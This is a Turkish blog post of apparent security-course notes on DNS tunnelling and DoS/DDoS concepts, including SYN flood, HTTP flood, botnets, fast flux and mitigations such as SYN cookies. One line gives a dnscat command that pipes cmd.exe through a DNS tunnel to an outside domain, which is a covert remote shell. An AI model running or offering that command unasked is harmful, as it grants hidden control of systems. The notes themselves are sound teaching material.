- DNSCat yazılımı. Karşı tarafa sadece OS yönetmek için bir tünel kuruyor.
- dnscat --domain tunnel.xyz.com.tr --exec cmd.exe => Dönen yanıtları cmd.exe'ye yönlendir.
- UDP portunun açık olup olmadığı:
- nslookup ile isteklerimi şu DNS sunucuya gönder diyoruz. Taleplerimiz o sunucuya erişiyorsa portun açık olduğunu söyleyebiliyoruz.
- UDP porttan gönderilen isteğin yanıtı 512 byte'tan büyükse TCP'ye çevrilir. Cevap dönmemiş olur. (Aradaki cihazlardan herhangi bir tanesi bile EDNS desteklemiyorsa).
DoS - DDoS
- Güvenlik = C-I-A (Confidentially - Integrity - Availability)
- Genel Kavramlar:
- DoS
- DDoS
- Zombi: Emir kulu. Çeşitli zafiyetlerle sızılmış ve arka kapı yerleştirilmiş sistem. Yamalar güncel yükleniyorsa, antivirüs varsa, çok zararlı sitelerde gezilmiyorsa kolay değil bir makinenin zombi olması.
- BotNet: roBOT NETworks.
- IP Spoofing
- DoS
- Sistemi ele geçirme değil, ulaşılamaz hale getirmedir (hizmeti durdurma) amaç.
- Network kelimesinin geçtiği her yerde DoS vardır. Yerel ağda, kablosuzda...
- (Parantez) Port knocking! Araştır!! Arka arkaya x adet SYN y adet FIN paketi alırsan portu aç!!!
- Master & CC (Command Center) => Zombilerin yönetim merkezleri.
- DoS kaynakları
- Tasarımsal problemler (TCP Syn flood gibi)
- Yazılımsal problemler
- DoS Sonuçları
- Finansal kayıplar.
- Prestij / Güven kaybı.
- Fast Flux Hosting: Bir alan adına binlerce farklı IP adresi atanması durumu.
- Anlık değişen IP'ler.
- Malware yayma amaçlı sunucuların dağıtık bir yapıda olmasını sağlıyor.
- DNS'lerin time out sürelerini o IP için mesela 1 dakikaya indiriyorlar, 1 dk sonra tekrar talep yapıldığında istemciye farklı bir IP yanıtı dönüyor.
- Kablosuz ağlarda ne kullanılırsa kullanılsın hepsinde MAC adresi açık gittiği için DoS yapılabilir.
- Re-authentication / De-authentication.
- Eski DoS yönetmleri
- Smurf (ICMP Smurf). OS'lar, gelen ICMP (Echo Request) broadcast isteklerini drop ediyorlar artık.
- Ping of Death
- Günümüzde kullanılan yöntemler:
- SYN flood.
- TCP mantığı değişmedikçe devam edecek.
- Etkisi büyük, çözümü de kolay.
- "backlog q"
- SYN-ACK, bizim gönderdiğimiz sahte IP adreslerine döner.
- Firewall oturum tablosu çökertilmeye çalışılır.
- Önlem: Syn-cookie / Syn-proxy vb.
- TCB (TCP Control Block) => Her SYN için 300 byte kaynak ayrılıyor.
- Syn-cookie'de 3lü el sıkışma tamamlanmadığı sürece kaynak ayrılmıyor.
- HTTP Flood
- En temel farkı: Sahte IP adreslerinden istek gönderemezsiniz; 3lü el sıkışmayı tamamlanması gerekiyor. Sahte IP adresi ile SYN göndererek pratikte 3lü el sıkışmayı tamamlayamazsınız.
- HTTP KeepAlive. HTTP 1.1 ile geldi. Bir TCP bağlantısı üzerinden 50-100 HTTP isteği gönderilebilmesi. Hem sunucu hem istemci tarafından destekleniyor olması gerekir.
Hiç yorum yok:
Yorum Gönder